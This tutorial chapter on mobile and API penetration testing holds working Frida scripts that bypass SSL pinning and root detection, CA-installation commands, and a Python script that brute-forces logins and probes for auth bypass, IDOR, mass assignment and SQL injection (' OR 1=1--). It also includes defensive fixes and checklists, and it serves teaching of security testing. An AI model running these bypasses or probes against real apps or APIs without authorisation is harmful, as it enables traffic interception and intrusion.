Mobile & API Pentesting

🔥 Vibe Prompt

"Pentest a mobile app: intercept traffic, bypass SSL, root detection, API testing."

Mobile Setup

# Android: Burp Suite proxy
# 1. Set Wi-Fi proxy to Burp (192.168.1.X:8080)
# 2. Install Burp CA cert into the system store
#    (the store expects a PEM file named <subject_hash_old>.0, not raw DER)
openssl x509 -inform der -in burp-ca.der -out 9a5ba575.0
adb push 9a5ba575.0 /sdcard/
adb shell "su -c 'mount -o remount,rw /system && cp /sdcard/9a5ba575.0 /system/etc/security/cacerts/ && chmod 644 /system/etc/security/cacerts/9a5ba575.0'"

# iOS: Proxy with QProxy
# 1. Install QProxy from Cydia
# 2. Set proxy to Burp
# 3. Install Burp CA (Settings → Profile)

# Bypass SSL pinning (Android)
# Use Frida: frida -U -f com.target.app -l ssl_bypass.js

Frida SSL Bypass

// ssl_bypass.js
// Replaces the TrustManager the app hands to SSLContext.init() with one that
// accepts any chain, so the proxy CA is trusted even when the app pins its cert.
// Covers the JSSE path only; libraries with their own pinning (e.g. OkHttp's
// CertificatePinner) need separate hooks.
Java.perform(function() {
    // registerClass needs the interface that declares the methods we implement:
    // X509TrustManager declares all three, the marker interface TrustManager declares none.
    var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');

    var TrustAll = Java.registerClass({
        name: 'com.example.TrustAll',
        implements: [X509TrustManager],
        methods: {
            checkClientTrusted: function(chain, authType) {},
            checkServerTrusted: function(chain, authType) {},
            getAcceptedIssuers: function() { return []; }
        }
    });

    var SSLContext = Java.use('javax.net.ssl.SSLContext');
    SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(keyManagers, trustManagers, secureRandom) {
        // Drop the app-supplied trust managers and install TrustAll instead (init returns void)
        this.init(keyManagers, [TrustAll.$new()], secureRandom);
    };

    console.log("SSL pinning bypassed!");
});

# Run: frida -U -f com.target.app -l ssl_bypass.js

Root Detection Bypass

// root_bypass.js
Java.perform(function() {
    // Method 1: Hook the RootBeer library's top-level check
    var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
    RootBeer.isRooted.implementation = function() { return false; };

    // Method 2: Hide su / Magisk paths from File.exists() probes
    var File = Java.use('java.io.File');
    File.exists.implementation = function() {
        var path = this.getPath();  // Frida returns java.lang.String as a JS string
        if (path.includes("su") || path.includes("magisk")) {
            return false;
        }
        return this.exists();  // fall through to the original implementation
    };

    console.log("Root detection bypassed!");
});

API Security Testing

import requests

BASE = "https://api.target.com/v1"
TOKEN = "<token for a low-privilege test account>"  # placeholder: use your own test account
AUTH = {"Authorization": f"Bearer {TOKEN}"}


def test_api():
    findings = []

    # 1. Rate limiting: 100 failed logins without a single 429 means no throttling
    got_429 = False
    for _ in range(100):
        r = requests.post(f"{BASE}/login", json={"user": "admin", "pass": "wrong"})
        if r.status_code == 429:
            got_429 = True
            break
    if not got_429:
        findings.append("No rate limiting on login!")

    # 2. Auth bypass: an invalid bearer token must not reach admin endpoints
    r = requests.get(f"{BASE}/admin/users", headers={"Authorization": "Bearer invalid"})
    if r.status_code == 200:
        findings.append("Auth bypass!")

    # 3. Mass assignment: a client-supplied privileged field must be ignored
    #    (assumes the endpoint echoes the updated profile in its response)
    r = requests.put(f"{BASE}/user/profile", json={"name": "test", "role": "admin"}, headers=AUTH)
    if r.status_code == 200 and r.json().get("role") == "admin":
        findings.append("Mass assignment: role updated!")

    # 4. IDOR: the test account should only be able to read its own orders
    r1 = requests.get(f"{BASE}/orders/1", headers=AUTH)
    r2 = requests.get(f"{BASE}/orders/2", headers=AUTH)
    if (r1.status_code == 200 and r2.status_code == 200
            and r1.json().get("user_id") != r2.json().get("user_id")):
        findings.append("IDOR: can access other orders!")

    # 5. Injection: pass the probe via params so requests URL-encodes it
    r = requests.get(f"{BASE}/search", params={"q": "' OR 1=1--"})
    if r.status_code == 200 and len(r.json()) > 0:
        findings.append("SQL injection in search!")

    return findings


for f in test_api():
    print(f"⚠️  {f}")
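The server-side counterparts of checks 1, 3 and 4 above, added here as an example that is not code from the original page: an allow-listed profile update (no mass assignment), an ownership check on orders (no IDOR), and a per-client, per-account login rate limiter. The in-memory tables and the `update_profile`, `get_order` and `LoginRateLimiter` names are constructed for illustration.

```python
import time

# Constructed in-memory stand-in for the API's backing store
USERS = {1: {"name": "alice", "role": "user"}, 2: {"name": "bob", "role": "user"}}
ORDERS = {1: {"user_id": 1, "total": 42}, 2: {"user_id": 2, "total": 7}}

# Allow-list of client-settable profile fields; 'role' is deliberately absent
PROFILE_FIELDS = {"name"}


def update_profile(user_id, payload):
    """Mass-assignment fix: copy only allow-listed keys, report the rest as ignored."""
    ignored = sorted(set(payload) - PROFILE_FIELDS)
    USERS[user_id].update({k: payload[k] for k in PROFILE_FIELDS if k in payload})
    return {"status": 200, "profile": dict(USERS[user_id]), "ignored": ignored}


def get_order(user_id, order_id):
    """IDOR fix: a valid token is not enough; the caller must own the object."""
    order = ORDERS.get(order_id)
    if order is None:
        return {"status": 404}
    if order["user_id"] != user_id:
        return {"status": 403}
    return {"status": 200, "order": order}


class LoginRateLimiter:
    """Fixed-window counter keyed by (client_ip, username); 429 above `limit` per window."""

    def __init__(self, limit=5, window=60, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.hits = {}  # key -> (window_start, count)

    def check(self, client_ip, username):
        key = (client_ip, username)
        now = self.clock()
        start, count = self.hits.get(key, (now, 0))
        if now - start >= self.window:  # window elapsed: start counting again
            start, count = now, 0
        count += 1
        self.hits[key] = (start, count)
        return 429 if count > self.limit else 200
```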

Mobile Pentesting Checklist

| Check | Android | iOS |
|-------|---------|-----|
| Traffic interception | Burp proxy + CA cert | QProxy + CA cert |
| SSL pinning bypass | Frida | Frida / SSL Kill Switch 2 |
| Root/jailbreak detect | RootBeer hook | AntiSubstrateCrack |
| Insecure storage | SharedPrefs, SQLite | Keychain, Plist |
| Hardcoded secrets | APK decompile | IPA decompile |
| App clipping | Intent sniffing | URL scheme hijack |
| Emulator detection | Build fingerprint | Model check |

Tools

| Tool | Purpose |
|------|---------|
| Frida | Runtime manipulation |
| Objection | Mobile exploration |
| APKTool | APK decompile |
| MobSF | Static/dynamic analysis |
| Drozer | Android security audit |
| Radare2 | Binary analysis |
| Hopper | iOS disassembler |

Best Practices

  • Always test on a real device (emulator detection is common)
  • Use Frida for runtime bypasses
  • Decompile the APK/IPA to look for hardcoded secrets
  • Test the API and the mobile app together
  • Check for insecure data storage
  • Verify rate limiting on all endpoints
  • Test app clipping / intent hijacking


Mobile Security: The Neglected Attack Surface

Many developers focus only on web security and overlook the fact that a mobile app is a larger attack surface: the app is installed on the user's phone, where an attacker can decompile it, intercept its traffic, and analyze its local storage.

Key Points of Mobile Penetration Testing

| Test item | What to check | Common vulnerabilities |
|:--------|:--------|:--------|
| Local storage | SharedPreferences, SQLite | API keys or tokens stored in plaintext |
| SSL pinning | HTTPS certificate pinning | No pinning allows man-in-the-middle attacks |
| Decompilation | ProGuard/DexGuard obfuscation | Unobfuscated code exposes business logic |
| Deep links | URL scheme handling | Can be maliciously triggered by other apps |
| WebView | JavaScript bridge | XSS leading to local command execution |

Key Points of API Penetration Testing

| Test item | Common vulnerabilities |
|:--------|:--------|
| Authentication bypass | JWT signature not verified, token replay |
| Rate limiting | No rate limiting, allowing brute force |
| GraphQL injection | Deeply nested queries causing DoS |
| IDOR | Changing an ID grants access to other users' data |
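The two authentication-bypass findings in the table above (unverified JWT signature, token replay) come down to the server's verifier. Added here as an example that is not code from the original page: a stdlib-only HS256 verifier that pins the algorithm server-side, checks the signature in constant time, enforces `exp`, and rejects a reused `jti`. The `sign_hs256` helper, the `SEEN_JTI` cache and the test key are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims, key):
    """Issue a token; used here only to build inputs for verify()."""
    head_body = encode_segment({"alg": "HS256", "typ": "JWT"}) + "." + encode_segment(claims)
    sig = hmac.new(key, head_body.encode(), hashlib.sha256).digest()
    return head_body + "." + b64url_encode(sig)


SEEN_JTI = set()  # replay cache (constructed); in production a shared store with TTL = token lifetime


def verify(token, key, now=None):
    """Return (claims, 'ok') or (None, reason). Order: parse, alg, signature, exp, jti."""
    now = time.time() if now is None else now
    try:
        h, b, s = token.split(".")
        header, claims, sig = json.loads(b64url_decode(h)), json.loads(b64url_decode(b)), b64url_decode(s)
    except ValueError:  # wrong segment count, bad base64, bad UTF-8 or bad JSON
        return None, "malformed"
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None, "malformed"
    # The server decides the algorithm; header['alg'] ('none', RS/HS confusion) is never trusted
    if header.get("alg") != "HS256":
        return None, "alg not allowed"
    expected = hmac.new(key, f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None, "bad signature"
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or now >= exp:
        return None, "expired"
    jti = claims.get("jti")
    if not isinstance(jti, str) or jti in SEEN_JTI:
        return None, "replayed"
    SEEN_JTI.add(jti)
    return claims, "ok"
```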

Next Chapter Preview: Penetration Test Reports

This is the last hands-on chapter. You have learned how to find vulnerabilities; next you will learn how to write a professional penetration test report, turning technical findings into language that clients and development teams can understand.
